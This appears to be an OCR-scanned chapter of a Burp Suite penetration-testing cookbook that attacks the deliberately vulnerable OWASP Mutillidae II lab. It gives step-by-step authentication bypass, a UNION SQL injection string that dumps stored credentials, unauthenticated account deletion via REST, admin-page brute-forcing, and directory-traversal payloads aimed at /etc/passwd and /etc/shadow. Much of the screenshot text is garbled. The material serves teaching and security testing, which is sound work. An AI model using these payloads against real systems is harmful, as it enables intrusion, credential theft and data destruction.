Target Spider | Scanner | Intruder | Repeater | Sequencer | Decoder | Comparer | Extender | Project options | User options | Alerts 


es | l WebSockets history | Options 


Filter: Hiding CSS, image and general binary content 


# ålj|Host | Method | URL | Params | Edited | Status | Length | MIMEtype | Extension | Title 
273 http://192.168.56.101 GET /mutilidae/index.php?page=login.php v 200 50789 HTML php 
274 _http://192.168.56.101 POST __/mutillidae/index.php?page=login. php 


v 50905 HTML php 


[Raw | Params | Headers | Hex 
GET /mutillidae/index.php?popUpNotificationCode=AUL HTTP/1.1 

Host: 192.168.56.101 

User-Agent: Mozilla/S.0 (Windows NT 10.0; Winé4; x64; rv:61.0) Gecko/20100101 Firefox/é1.0 

Accept: text/html, application/xhtml+xml,application/xml;q=0.5,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate Send to Spider 
Referer: http: //192.168.56.101/mutillidae/index.php?page=login.php 


Cookie: showhints=1; username=admin; uid=1; PHPSESSID=gSqnSmlhScdhuddus3tq) DO an active scan 
Connection: close 


tto,phpbbl,redmine; acgroupswithpersist=nada 


Do a passive scan 
Upgrade-Insecure-Requests: 1 Send to Intruder Ctr 
Send to Repeater Ctri+R 


Send to Sequencer 


8. Go to Burp's Comparer tab. Notice the two requests you sent are 
highlighted. Press the Words button on the bottom right-hand side, to 
compare the two requests at the same time: 


; 


Comparer g 
This function lets you do a word- or byte-evel comparison between different data, You can oad, paste, or send data here from other tools and then select the comparison you want to perform. 
Select tem 
H ‘Length | Dala Paste 
$ 95 GET inutiidaeindex php?popUploticationCodesAUt HTTP, Host 192.168.38.101User-Agent Mozila 0 (Windows NT 10.. load 
Remove 
Cleat 
Select tem? 
t Length | Data 
4 63 GET Imutidaeindex pho ?pageshome phoSopUpNotficalonCodeHPHO HTTP. Host 192.168.38.10 1User-Agent Nozila... 
3 cae SET mutiidae/ndex.oho?pooUoNotificationCodesAllt HTTP tHost: 192 168.56 10UserAnent MozilalS.0 (Windows NT 10, 
Compare. 


E 


9. A dialog pop-up displays the two requests with color-coded highlights to 
draw your eyes to the differences. Note the changes in the Referer header 
and the additional name/value pair placed in the admin account cookie. 
Close the pop-up box with the X on the right-hand side: 


e Ea 
Length: 603 @ Text © Hex Length: 585 @ Text O Hex 
GET /mutiadae/index php 7SGESBORNBIBEBE p0pUpNotificatonCode=HiBHO HTTP/1.1 GET /mutitidae/index php?popUpNotificatonCode= Ai] HTTP/1.1 
Host 192.168.56.101 


Host: 192.168.56.101 
User-Agent: Mozila/S.0 (Windows NT 10.0; Win64; x64: rv-61.0) Gecko/20100101 Firefox/61.0 User-Agent: Mozilia/S.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0 
Accept texthhtml appication/xhtmi+xmi appication’xmt.q=0.9,*/":q=0.8 Accept: text/html application/xhtmi+xmi, application/xmtq=0.9,*/":q=0.8 
Accept-Language: en-US,en:q=0.5 Accept-Language: en-US,en;q=0.5 


Referer nttp-//192 168 56 10 1/mutilidse/ndex php?psqe~figime oho! 

‘Cookie. showhints=1, PHPSESSD=gsqnom i nscdnuddussig lamnss, acopendivids=swingset jotto,pnpbb2,redmine; acgroupswithpersist=nada coo : 
Connection: close ‘acgroupswithpersistenada 
Upgrade-insecure-Requests: 1 Connection: close 
Upgrade-insecure-Requests: 1 


Referer: http//192.168.56.101/mutilidae/index php?page=fagin. ohp 
okie showhints 1, PHPSESSD=qSan9 


Key Modified Deleted Acces 


O Sync views 


10. Return to Repeater, which contains your first GET request you performed as 


unauthenticated. Prior to performing this attack, make sure you are 
completely logged out of the application. 


11. You can verify you are logged out by clicking the Go button in Repeater 
associated to your unauthenticated request: 


. z Target: http://192.168.56.101 | | 2 
Request Response 
(Paw Params | Headers | Hex | Raw | Headers | Hex | HTML Render | 
Gi index.php?page*home. phpapopUpMot i ficationCode=HPHO HTTP/1.1 ry 

t . . . . r 
@ OWASP Mutillidae II: Web Pwn in Mass Productio 


Version: 2.6.24 Security Level: 0 (Hosed) Hints: Enabled (1 - Script K1dd1e) 


rv:61.0) Gecko/20100101 Firefox/é1.0 
1: q"0.9,*/42q"0.0 


e 

ttp: //192. 160. $6. 101/muti1lidae/index. php?page=login. phpépopUpNot ií ficat ionCode=LOUL 
SESSID=gSqmSmlhSedhu0dut3tqlqjm54; 

eto, phpbb, redmine; acgroupswithpersist=nada 


" = OWASP 2013 Mutillidae: Deliberately Vulnerable | 


OWASP 2010 Web Pen-Testing Application 


OWASP 2007 r Like Mutillidae? Check out how to help 


12. Now flip over to the Repeater tab, which contains your second GET request 
as authenticated user admin. Copy the values for Referer header and 
Cookie from the authenticated request. This attack is parameter 
modification for the purpose of bypassing authentication: 


Go Cance <ir >i 


Request 


Rew Pre [ences [He 


GET /mutillidae/index.php?popUpNotificationCode=AUl HTITP/1.1 

Host: 192.168.56.101 

User-Agent: Mozilla/5.0 (Windows NT 10.0; Winé4; x64; rv:61.0) Gecko/20100101 Firefox/6é1.0 
Accept: text/html,application/xhtmltxml, application/xml;q=0.9,*/*;q=0.8 

Accept-Language: en-US,en;q=0.5 
Accept-Encoding: i deflate 


; acgroupswithpersist=1 


connection: close 
Upgrade-Insecure-Requests: 1 


13. Copy the highlighted headers (Referer and Cookie) from the authenticated 
GET request. You are going to paste those values into the unauthenticated 
GET request. 

14. Replace the same headers in the unauthenticated GET request by 
highlighting and right-clicking, and select Paste. 

15. Right-click and select Paste in the Repeater | Raw tab of the first GET 
request you performed as unauthenticated. 


16. Click the Go button to send your modified GET request. Remember, this is 


the first GET request you performed as unauthenticated. 

17. Verify that you are now logged in as admin in the Response | Render tab. 
We were able to bypass the authentication mechanism (that is, the log in 
page) by performing parameter manipulation: 


Response 


Raw | Headers | Hex | HTML | Render | 


© OWASP Mutillidae II: Web Pwn in Mass Production 


Version: 2.6.24 


Security Level: O (Hosed) Hints: Enabled (1 - Script Kiddie) [Logged In Admin: admin (gOt root? 


OWASP 2013 


Mutillidae: Deliberately 
OWASP 2010 Vulnerable Web Pen-Testing 
OWASP 2007 Application 


How it works 


By replaying both the token found in the cookie and the referer value of the 
authenticated request into the unauthenticated request, we are able to bypass the 
authentication scheme and gain unauthorized access to the application. 


Testing for browser cache weaknesses 


Browser caching is provided for improved performance and better end-user 
experience. However, when sensitive data is typed into a browser by the user, 
such data can also be cached in the browser history. This cached data is visible 
by examining the browser's cache or simply by pressing the browser's back 
button. 


Getting ready 


Using the browser's back button, determine whether login credentials are cached, 
allowing for unauthorized access. Examine these steps in Burp, to understand the 
vulnerability. 


How to do it... 


1. Log into the Mutillidae application as admin with the password admin. 

2. Now log out of the application by clicking the Logout button from the top 

menu. 

Verify you are logged out by noting the Not Logged In message. 

4. View these steps as messages in Burp's Proxy | History as well. Note the 
logout performs a 302 redirect in an effort to not cache cookies or 
credentials in the browser: 


319 http/192.168.56.101 

320 http://192.168.56.101 
321 http/192.168.56.101 
a 


Request | Response 
Sppawi| params [eaders [ee } 


GET /mutillidae/index.php?page=login. php&popUpNotificationCode=LOUL HTTP/1.1 
Host: 192.168.56.101 
User-Agent: Mozilla/S.0 (Windows NT 10.0; Winé4; x64; rv:61.0) Gecko/20100101 Firefox/é1l.0 


Accept: text/html,application/xhtmlt+xml,application/xml;q=0.9,*/*;q=0.8 

Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 

Referer: http: //192.168.56.101/mutillidae/index.php?popUpNoti ficationCode=AUL 

Cookie: showhints=1; PHPSESSID=gSqnSmlhScdhu0duS3tqlqjmS4; acopendivids=swingset ,jotto,phpbbl,redmine; acgroupswithpersist=nada 
Connection: close 

Upgrade-Insecure-Requests: 1 


5. From the Firefox browser, click the back button and notice that you are now 
logged in as admin even though you did not log in! This is possible because 
of cached credentials stored in the browser and the lack of any cache- 
control protections set in the application. 

6. Now refresh/reload the page in the browser, and you will see you are logged 
out again. 

7. Examine the steps within the Proxy | HTTP history tab. Review the steps 
you did through the browser against the messages captured in the Proxy | 
HTTP history table: 

o Request 1 in the following screenshot is unauthenticate 

o Request 35 is the successful login (302) as admin 

o Request 37 is the logout of the admin account 

o Requests 38 and 39 are the refresh or reload of the browser page, 
logging us out again 


8. There is no request captured when you press the browser's back button. 
This is because the back button action is contained in the browser. No 
message was sent through Burp to the web server to perform this action. 


This is an important distinction to note. Nonetheless, we found a 
vulnerability associated with weak browser-caching protection. In cases 
such as this, penetration testers will take a screenshot of the logged-in 


cached page, seen after clicking the back button: 
Ler options 


Sega 


Pern sorp CS, mage and ger nay con 


ose Sts. oh yn 


Testing the account provisioning 
process via the REST API 


Account provisioning is the process of establishing and maintaining user 
accounts within an application. Provisioning capabilities are usually restricted to 
administrator accounts. Penetration testers must validate account-provisioning 
functions are done by users providing proper identification and authorization. A 
common venue for account provisioning is through Representational State 
Transfer (REST) API calls. Many times, developers may not put the same 
authorization checks in place for API calls that are used in the UI portion of an 
application. 


Getting ready 


Using REST API calls available in the OWASP Mutillidae IT application, 
determine whether an unauthenticated API call can provision or modify users. 


How to do it... 


Make sure you are not logged into the application. If you are, click the Logout 
button from the top menu. 


1. Within Mutillidae, browse to the User Lookup (SQL) Page and select 
OWASP 2013 | A1 Injection (SQL) | SQLi — Extract Data | User Info 


(SQL): 


Home Login/Register Toggle Hints Show Popup Hints Toggle Security Enforce SSL ResetDB ViewLog View Captured 


OWASP 2013 At - Injection (SQL) >’ SQLi - Extract Data P User Info (SQL) 


2. Type user for Name and user for Password, and click View Account 
Details. You should see the results shown in the next screenshot. This is the 
account we will test provisioning functions against, using REST calls: 


©% OWASP Mutillidae II: Web Pwn in Mass Production 


Version: 2.6.24 Security Level: 0 (Hosed) Hints: Enabled (1 -Script Kiddie) Not Logged In 
Home Login/Register Toggle Hints Show Popup Hints Toggle Security Enforce SSL ResetDB ViewLog View Captured Data 


OwasP 2013 
User Lookup (SQL 
Q Back 9 Help Me! 


Hints 


fan \ 
——— ys Switch to SOAP Web Service version fis Switch to XPath version 


ane 
Please enter username and password 
to view account details | 


Y Name | 
Getting Started: 
P d | 
Project Whitepaper — 
Vew Aout Deas 
$ Dont have an account? Please register here 
| Results for “user".1 records found, 
Release i - 
Announcements Usemamezuser 
Password=User 
Signature=User Account 
YOu 


Through Spidering, Burp can find /api or /rest folders. Such folders are 
clues that an application is REST API enabled. A tester needs to 


determine which functions are available through these API calls. 


3. For Mutillidae, the /webservices/rest/ folder structure offers account 
provisioning through REST API calls. 

4. To go directly to this structure within Mutillidae, select Web Services | 
REST | SQL Injection | User Account Management: 


Home Login/Register Toggle Hints Show Popup Hints Toggle Security Enforce SSL ResetDB ViewLog View Captured 
owasp 2013 ?} 
User Lookup (SQL) 
owasP2010 ?} 
owasp 2007s @ Help Me! 


Web Services SOAP 


} iecti } 
HTML 5 REST SQL Injection User Account Management 


~] Username Enumeration 
f poyi 


You are presented with a screen describing the supported REST calls and 
parameters required for each call: 


(A) 192.168,56,101/mutillidae/y 
¢2¢4 © 192.16856.101/mutilidae/webservices/rest/ws-user-a A «OY 


Back to Home Page 


Help: This service exposes GET, POST, PUT, DELETE methods. This service is vulnerable to SQL injection in security level 0. 


DEFAULT GET; (without any parameters) will display this help plus a list of accounts in the system. 


Optional params: None. 


GET: Either displays usernames of all accounts or the username and signature of one account. 


en 


Optional params: username AS URL parameter. If username is "*" then all accounts are returned. 
Example(s): 


Get a particular user: /mutillidae/webservices/rest/ws-user-account,php?username=adrian 
Get all users: /mutillidae/webservices/rest/ws-user-account.ph, 


Example Exploit(s): 


SQL injection: /mutillidac/webservices/rest/Ws-user- 


account. php?username=} uniontselect/concat("Thetpassword+fort'username,'+is+'¢ password), mysignature+from#accounts+--4 


POST: Creates new account. 


Required params; username, password AS POST parameter. 
Optional params: signature AS POST parameter. 


PUT: Creates or updates account. 


Required params; username, password AS POST parameter, 
Optional params; signature AS POST parameter, 


5. Let's try to invoke one of the REST calls. Go to the Proxy | HTTP history 
table and select the latest request you sent from the menu, to get to the User 
Account Management page. Right-click and send this request to 
Repeater: 


Target Spider | Scanner | Intruder | Repeater | Sequencer | Decoder | Comparer | Extender | Project options | User options | Alerts 


Filter: Hiding CSS, image and general binary content 


| Params | Edited | Status | Length 


| MIME type | Extension 


GET /mutillidae/webservices/rest/ws-user-account.php HTTP/1.1 

Host: 192.168.56.101 

User-Agent: Mozilla/5.0 (Windows NT 10.0; Winé4; x64; rv:61.0) Gecko/20100101 Firefox/é1.0 
Accept: text/html,application/xhtmltxml, application/xml;q=0.9,*/*;q=0.8 z 
Accept-Language: en-US,en;q=0.5 Send to Spider 
Accept-Encoding: gzip, deflate 


Do an active scan 
Referer: http://192.168.56.10l/mutillidae/index.php?page=home.phpápopUpNotificationCode=HPHO 


Cookie: showhints=l; PHPSESSID=g5qm9mlh5cdhu0du83tqlqjm54; acopendivids=swingset,jotto,phpbb2 


Do a passive scan 


Connection: close Send to Intruder 
Upgrade-Insecure-Requests: 1 


6. In Burp's Repeater, add the ?, followed by a parameter name/value pair of 
username=user to the URL. The new URL should be as follows: 


/mutillidae/webservices/rest/ws -user -account . php? 
username=user 


Host: 192. 60.96. 10 

User-Agent: Mozilla/5.0 (Windows NT 10.0; Winéd; xé4; rv:61.0) Gecko/20100101 Firefox/él.0 
Accept: text/htwl application/zhtwltxml application/xml;g=0.$,*/*;g=0.8 

Accept-Language: en-US en;ge0. 5 

Accept-Encoding: gzip, deflate 

Referer: http: //L92, 168.56. 10L/mutallidae/index. php?page=Login. phptpoplpllotiticationCode=LOUL 
Cookie: showhints=1; PHPOBSoID=goqnomlhoedhuddud3tqLajmsd; 
acopendivids=swingset Jotto, phpbb’, redwine; acqroupswithpersist=nada 

Connection: close 

Upgrade-Insecure-Requests: 1 


7. Click the Go button and notice we are able to retrieve data as an 
unauthenticated user! No authentication token is required to perform such 
actions: 


Response 


HITE/L.1 200 UK 

Date: Thu, 30 Aug 2018 16:05:26 GUT 

server: Apache/?.2.14 (Ubuntu) nod nono/2. 4.3 PHD /5.3.2-lubuntud. 30 with Suhosin-Patch 
proxy html/3.0.1 mod python/3.9.1 Python/2.6.$ mod ssl/2.2.14 Open$$1/0. 9.0k 
Phusion Passenger/4.0.38 mod perl/2.0.4 Perd/vi. 10.1 

X-Powered-By: PHP/4.3.2-Lubuntud. 30 

Bypires: Thu, 19 Nov 1981 08:52:00 Gu? 

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 
Praga: no-cache 

Vary: Accept-Encoding 

Content-Length: 72 

Comection: close 

Content-Type: text /htwl 


Result: {Accounts: {[{ "username": "user", "nysiqnature': "User Account’})}} 


8. Let's see what else we can do. Using the SQL Injection string given on the 
User Account Management page, let's attempt to dump the entire user 
table. 

9. Append the following value after username=: 


user '+union+select+concat ('The+password+for+',username, '+is+' 
, +password) ,mysignature+from+accounts+- -+ 


The new URL should be the following one: 


/mutillidae/webservices/rest/ws-user-account . php? 
username=user '+union+select+concat ('The+password+for+',userna 
me, '+is+',+password) ,mysignature+from+accounts+- -+ 


10. Click the Go button after making the change to the username parameter. 
Your request should look as shown in the following screenshot: 


Request 


Scie 


wutillidae/webservices/rest/ws-user-account. php?username= 


User-Agent: Mozilla/S.0 (Windows NT 10.0; Winé4; x64; rv:61.0) Gecko/20100101 Firefox/él.0 
Accept: text/html, application/xhtmltxml, application/xml;q=0.9,*/*;q=0.8 

Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 

Referer: http: //192. 168.56. 10L/mutillidae/index. php?page=Login. phpépopUpNotificationCode=LOUL 
Cookie: showhints=1; PHPSESSID=gSqn$mlhdedhuddudstqlqjm54; 
acopendivids=swingset , jotto,phpbh2,redmine; acgroupswithpersist=nada 

Connection: close 

Upgrade-Insecure-Requests: 1 


11. Notice we dumped all of the accounts in the database, displaying all 
usernames, passwords, and signatures: 


Response 


nma 


X-Powered-By: PHP/S.3.2-Lubuntud. 30 

Expires: Thu, 19 Nov 1981 08:52:00 GMT 

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 
Praa: no-cache 

Vary: Accept-Encoding 

Content-Length: 2046 

Connection: close 

Content-Type: text/html 


Result: {Accounts: {[{ "username": "user", "mysignature':"Vser Account}, {"username": "The password for admin 
is admin", "mysignature': "gt r00t?"}, {"username": "The password for adrian is 

somepassword"  "mysignature": "Zombie Films Rock!"},{ "username": "The password for john is 

monkey", "nysignature":"I like the smell of confunk"},{ "username"; The password for jeremy is 

password", "nysignature":"d1373 1337 speak}, {"username": The password for bryce is 

password" "nysiqnature";"I Love SANS"},{ "username": "The password for samurai is 

samurai", "mysignature': "Carving fools"},{ "username": "The password for jim is password", "mysignature' : "Rome 
is burning"},{"username": "The password for bobby is password", "nysiqnatwre': "Hank is my 

dad"},{ "username": "The password for simba is password", "mysignature':"I am a super-cat"},{ "username": "The 
password for dreveil is password", "nysiqnature": "Preparation H"},{"username"; "The password for scotty is 
password", "nysiqnature": "Scotty do"},{ "username": "The password for cal is password", 'mysignature': 'C-A-T-§ 
Cats Cats Cats"},{"username": "The password for john is password", "mysiqnature":"Do the 

Duggie!"},{ "username": "The password for kevin is 42", "nysignature": "Doug Adams rocks}, { "username": "The 
password for dave is set", "nysignature': "Bet on S.E.T. FTW"},{"usernane": "The password for patches is 
tortoise", "mysiqnature": 'meow'} ,{ "username": "The password for rocky is 

stripes", "nysignature": "treats?"},{"username': "The password for tim is lanmaster53", "mysignature": "Because 
reconnaissance is hard to spell"},{"username": "The password for ABaker is SoSecret", "mysignature": "Muffin 
tops only"},{"username": "The password for PPan is NotTelling", "mysiqnature": "Where is 

Tinker?"},{ "username": "The password for Cook is JollyRoger", ‘mysiqnature": "Gator~hater"}, { "username": "The 
password for james is i<3devs","wysiqnature": "Occupation: Researcher"},{"username": "The password for user 
is user", "nysigqnature": "User Account"},("username": "The password for ed is 

pentest", "mysiqnature":"Commandline KungFu anyone?"})}} 


12. Armed with this information, return to Proxy | HTTP History, select the 
request you made to see the User Account Management page, right-click, 
and send to Repeater. 


13. In Repeater, modify the GET verb and replace it with DELETE within the 
Raw tab of the Request: 


| oo | Cancel [<l > 


Request 


User-Agent: Mozilla/5.0 (Windows NT 10.0; Winéd; x64; rv:61.0) Gecko/20100101 Firefox/61.0 
Accept: text/htul, application/xhtmltxul, application/xml;q20.5,*/*;g=0.8 

Accept-Language: en-US, en-qe0. 9 

Accept-Encoding: gzip, deflate 

Referer: http: //192. 168.6. 101/mutillidae/index.php?page=login. phpépoplpMotificationCode=LOUL 
(Cookie: showhints=1; PHPSESSID=qSqnSulh$cdhuddudstqlqjmsd; 
acopendivids=swingset, Jotto, phpbb, redmine; acgroupswithpersist=nada 

‘Connection: close 

Upgrade-Insecure-Requests: 1 

‘Content-Type: application/x-wnw-form-urlencoded 

Content-Length: 27 


Username=user ipas sword=user 


14. Move to the Params tab, click the Add button, and add two Body type 
parameters: first, a username with the value set to user, and second, a 
password with the value set to user, and then click the Go button: 


[fon rm [ee 


DELETE request to /mutiidaelwebservices/rest/ws-user-account php 


Type “Name [Vate 
Cookie showhints | | : 
Cookie PHPSESSID goqndmthSedhuddud3tq lqjms4 Remove 
Cookie acopendivids swingsetjotto,phpbb2 redmine | 
‘| Cookie acorounswithpersist ‘lif 
| 7 | amam 
(| Down 


15. Notice we deleted the account! We were able to retrieve information and 
even modify (delete) rows within the database without ever showing an API 
key or authentication token! 


Response 


Aro 


HITP/1.1 200 OK 

Date: Thu, 30 Aug 2018 16:15:07 GMT 

server: Apache/2.2.14 (Ubuntu) mod mono/2.4.3 PHP/§.3.2-Lubuntud.30 with Suhosin-Patch 
proxy html/3.0.1 mod_python/3.3.1 Python/2.é.5 mod ssl/2.2.14 Qpenssh/0.9. 8k 
Phusion_Passenger/4.0.39 mod perl/2.0.4 Perl/vs. 10.1 

X-Powered-By: PHP/S.3.2-Lubuntud. 30 

Expires: Thu, 19 Nov 1981 08:52:00 GMT 

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 
Praa: no-cache 

Vary: Accept-Encoding 

Content-Length: 30 

Connection: close 

Content-Type: text/html 


Result: {Deleted account user} 


Note: If you wish to re-create the user account, repeat the previous steps, 
replacing delete with put. A signature is optional. Click the Go button. The user 
account is re-created again. 


Assessing Authorization Checks 


In this chapter, we will cover the following recipes: 


Testing for directory traversal 

Testing for Local File Include (LFT) 
Testing for Remote File Include (RFI) 
Testing for privilege escalation 

Testing for insecure direct object reference 


Introduction 


This chapter covers the basics of authorization, including an explanation of how 
an application uses roles to determine user functions. Web penetration testing 
involves key assessments to determine how well the application validates 
functions assigned to a given role, and we will learn how to use Burp to perform 
such tests. 


Software requirements 


To complete the recipes in this chapter, you will need the following: 


e OWASP broken web applications (VM) 
o OWASP mutillidae link 
e Burp Proxy Community or Professional (https://portswigger.net/burp/) 


e Firefox browser configured to allow Burp to proxy traffic 


(https://www.mozilla.org/en-US/firefox/new/) 
e The wfuzz wordlist repository from GitHub 


(https://github.com/xmendez/wfuzz) 


Testing for directory traversal 


Directory traversal attacks are attempts to discover or forced browse to 
unauthorized web pages usually designed for administrators of the application. If 
an application does not configure the web document root properly and does not 
include proper authorization checks for each page accessed, a directory traversal 
vulnerability could exist. In particular situations, such a weakness could lead to 
system command injection attacks or the ability of an attacker to perform 
arbitrary code execution. 


Getting ready 


Using OWASP Mutillidae IT as our target application, let's determine whether it 
contains any directory traversal vulnerabilities. 


How to do it... 


Ensure Burp and the OWASP BWA VM are running and that Burp is configured 
in the Firefox browser used to view the OWASP BWA applications. 


1. From the OWASP BWA Landing page, click the link to the OWASP 
Mutillidae II application. 

2. Open the Firefox browser on the login screen of OWASP Mutillidae II. 
From the top menu, click Login. 

3. Find the request you just performed within the Proxy | HTTP history table. 
Look for the call to the login. php page. Highlight the message, move your 
cursor into the Raw tab of the Request tab, right-click, and click on Send 
to Intruder: 


gg Burp Suite Professional v1.7.35 - Temporary Project - licensed to Sunny Wear [single user license] 


Burp Intruder Repeater Window Help 


PA SS SS SS TT 
( mercept [ere niston | WebSockets history | Options 


| Filter: Hiding CSS, image and general binary content 


# å | Host 


[ Raw | Params | Headers | Hex 


GET /mutillidae/index.php?page=login.php HTTP/1.1 

Host: 192.168.56.101 

User-Agent: Mozilla/5.0 (Windows NT 10.0; Winé4; x64; rv:61.0) Gecko/20100101 Firefox/é1.0 
Accept: text/html,application/xhtmltxml, application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate i Send to Spider 
Referer: http://192.168.56.10l/mutillidae/ 

Cookie: showhints=l; PHPSESSID=c766tk7i9odq5g4lumc2cco6k2; acopendivids=swingsd DO an active scan cis 


Connection: close Do a passive scan 
Upgrade-Insecure-Requests: 1 


Send to Repeater Ctri-R 
Send to Sequencer 

Send to Comparer 

Send to Decoder 

Show response in browser 


Request in browser > 


Copy as curl command 
Copy to file 


4. Switch over to the Intruder | Positions tab, and clear all Burp-defined 
payload markers by clicking the Clear $ button on the right-hand side. 


5. Highlight the value currently stored in the page parameter (login. php), and 
place a payload marker around it using the Add § button: 


[reset peti] roves on] 


(2) Payload Positions Start attack 


Configure the positions where payloads will be inserted into the base request. The attack type determines the way in which payloads are assigned to 
payload positions - see help for full details. 


Attack type: | Sniper M 
GET /mutillidae/index.php?page4§login-php§] HTTP/1.1 a 


Host: 192.168.56.101 

User-Agent: Mozilla/5.0 (Windows NT 10.0; Winé4; x64; rv:61.0) Gecko/20100101 Firefox/é1.0 —— 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Clear § 
àccept-Language: en-US,en;q=0.5 


Accept-Encoding: gzip, deflate Auto § 


Referer: http://192.168.56.10l/mutillidae/ 

Cookie: showhints=1; PHPSESSID=c7é6tk7iSodqSg4lumelecoék2; Refresh 
acopendivids=swingset ,jotto,phpbb2,redmine; acgroupswithpersist=nada 

Connection: close 

Upgrade-Insecure-Requests: 1 


6. Continue to the Intruder | Payloads tab, and select the following wordlist 
from the wfuzz repository: admin-panels.txt. The location of the wordlist 
from the GitHub repository follows this folder structure: 
wfuzz/wordlist/general/admin-panels. txt. 


7. Click the Load button within the Payload Options [Simple list] section of 
the Intruder | Payloads, tab and a popup will display, prompting for the 
location of your wordlist. 

8. Browse to the location where you downloaded the wfuzz repository from 
GitHub. Continue to search through the wfuzz folder structure 
(wfuzz/wordlist/general/) until you reach the admin-panels.txt file, and 
then select the file by clicking Open: 


(2) 


9. 


(2) 


10. 


11. 


Payload Sets 


You can define one or more payload sets. The number of payload sets depends on the attack type defined in the Positions tab. Various 
are available for each payload set, and each payload type can be customized in different ways. 


Payload set: | 1 7 Payload count: 0 


Payload type: | Simple list l 
| toon: (E genersi i) D (e 


Payload Options [Simple list 


L na 
This payload type lets you configure; | — ———— = eee 
big.txt |_| medium.txt 
ime he 
m = catala.tet — megabeast.txt 
|| common.txt (| mutations_common.txt 
“| euskera.txt “| spanish.txt 
— [m extensions_common.txt [F] test.txt 
Remove 
Clear File Name: admin-panels. txt 
Files of Type: | All Files ba 
Add Enter a new item 
(emes ) 
Add from list ... : 


Scroll to the bottom and uncheck (by default, it is checked) the option 
URL-encode these characters: 


Payload Encoding 


This setting can be used to URL-encode selected characters within the final payload, for safe transmission within HTTP requests. 


O URL-encode these characters: .=<>?+&*.-"4" 


You are now ready to begin the attack. Click the Start attack button at the 
top right-hand corner of the Intruder | Positions page: 


The attack results table will appear. Allow the attacks to complete. There 
are 137 payloads in the admin-panels.txt wordlist. Sort on the Length 
column from ascending to descending order, to see which of the payloads 
hit a web page. 


Notice the payloads that have larger response lengths. This looks 
promising! Perhaps we have stumbled upon some administration pages that 


may contain fingerprinting information or unauthorized access: 


Bint ruder attack 4 


[enum [trot | postions T pavionas T ons ] 


| Filter: Showing all tems 
— | Payload Status | Error Timeout 


administrator.php O UO 

admin.php E = 

o 2 

login.php = UO 

L) 2 
50 panel-administracion/login.html 200 g UO 42002 
104 paneladministracion/index.html 200 UO UO 42002 
105 paneLadministracion/admin.html 200 =) O 42002 
116 pane-administracion/login.php 200 2 =) 41996 
124 panebadministracion/index.php 200 O O 41996 
125 pane-administracion/admin.php 200 5 O 41996 
74 pages/admin/admin-login.html 200 O O 41934 
62 pages/admin/admin-login.php 200 S O 41978 
ini DAN faa A AAT 


12. Select the first page in the list with the largest length, administrator.php. 
From the attack results table, look at the Response | Render tab, and notice 
the page displays the PHP version and the system information: 


Attack Save Columns 


| Results l Target | Positions | Payloads | Options 


Filter: Showing all items 


®©% OWASP Mutillidae II: Web Pwn in Mass Produc 


Version: 2.6.24 Security Level: 0 (Hosed) Hints: Enabled (1 - Script Kiddie) Not Logged In 


OWASP 2013 
OWASP 2010 
OWASP 2007 
Web Services 


eee PHP Version 


Others 


How it works... 


Without even being logged in, we were able to force browse to an area of the 
web application that was unmapped. The term unmapped means the application 
itself had no direct link to this secret configuration page. However, using Burp 
Intruder and a wordlist containing commonly known administration file names, 
we were able to discover the page using the directory traversal attack. 


Testing for Local File Include (LFT) 


Web servers control access to privileged files and resources through 
configuration settings. Privileged files include files that should only be 
accessible by system administrators. For example, the /etc/passwd file on 
UNIX-like platforms or the boot. ini file on Windows systems. 


A LFI attack is an attempt to access privileged files using directory traversal 
attacks. LFI attacks include different styles including the dot-dot-slash attack 
(../), directory brute-forcing, directory climbing, or backtracking. 


Getting ready 


Using OWASP Mutillidae IT as our target application, let's determine whether it 
contains any LFI vulnerabilities. 


How to do it... 


Ensure Burp and OWASP BWA VM are running and that Burp is configured in 
the Firefox browser used to view the OWASP BWA applications. 


1. 


2: 


From the OWASP BWA Landing page, click the link to the OWASP 
Mutillidae II application. 

Open the Firefox browser to the login screen of OWASP Mutillidae II. 
From the top menu, click Login. 

Find the request you just performed within the Proxy | HTTP history table. 
Look for the call to the login. php page. Highlight the message, move your 
cursor into the Raw tab of the Request tab, right-click, and Send to 
Intruder. 

Switch over to the Intruder | Positions tab, and clear all Burp-defined 
payload markers by clicking the Clear § button on the right-hand side. 
Highlight the value currently stored in the page parameter (login. php), and 
place a payload marker around it using the Add § button on the right-hand 
side. 


Continue to the Intruder | Payloads tab. Select the following wordlist 
from the wfuzz repository: Traversal.txt. The location of the wordlist 
from the GitHub repository follows this folder structure: 
wfuzz/wordlist/injections/Traversal. txt. 


Click the Load button within the Payload Options [Simple list] section of 
the Intruder | Payloads tab. A popup will display, prompting for the 
location of your wordlist. 

Browse to the location where you downloaded the wfuzz repository from 
GitHub. Continue to search through wfuzz folder structure until you reach 
the admin-panels.txt file. Select the file and click Open: 


(2) Payload Sets 


You can define one or more payload sets. The number of payload sets depends on the attack type defined in the Positions tab. Various payload types are availa 
can be customized in different ways. 


Payload set: 1 |y Payload count: 68 


Payload type: | Simple list |x) Request count: ¢ 


| took in: | (G@ Injections i) (@)l ejl ü) Ee) | 


(2) Payload Options [Simple list] 


This payload type lets you configure a simple list of strings that ar B ake 
|} bad_chars.txt 
Paste AAA Ad Ad AAA A. JeACINOStS%00 [À sait 
AAA AAA detcihosts | | Traversal.txt 


..}.Jboot.ini TS) XML.bt 


LAA AAAA AAA [® xss tet 
Remove AAA AAA ALL detcipasswd%00 —_ 
— AMAA tete passwd 
Clear AAA d.d.d. detcishadow %00 File Name: 
ALAA letcishadow 


bd bbb ddd A detcipasswa 


Files of Type: | All Files z |v 


1 


Add Enter a new item 


= [Eoen] | cence 
Add from list ... in| | open | ncel 


9. Scroll to the bottom and uncheck (by default, it is checked) the option 
URL -encode these characters. 
10. You are now ready to begin the attack. Click the Start attack button at the 
top-right-hand corner of the Intruder | Positions page. 


11. The attack results table will appear. Allow the attacks to complete. Sort on 
the Length column from ascending to descending order, to see which of the 
payloads hit a web page. Notice the payloads with larger lengths; perhaps 
we gained unauthorized access to the system configuration files! 


| Intruder attack 6 


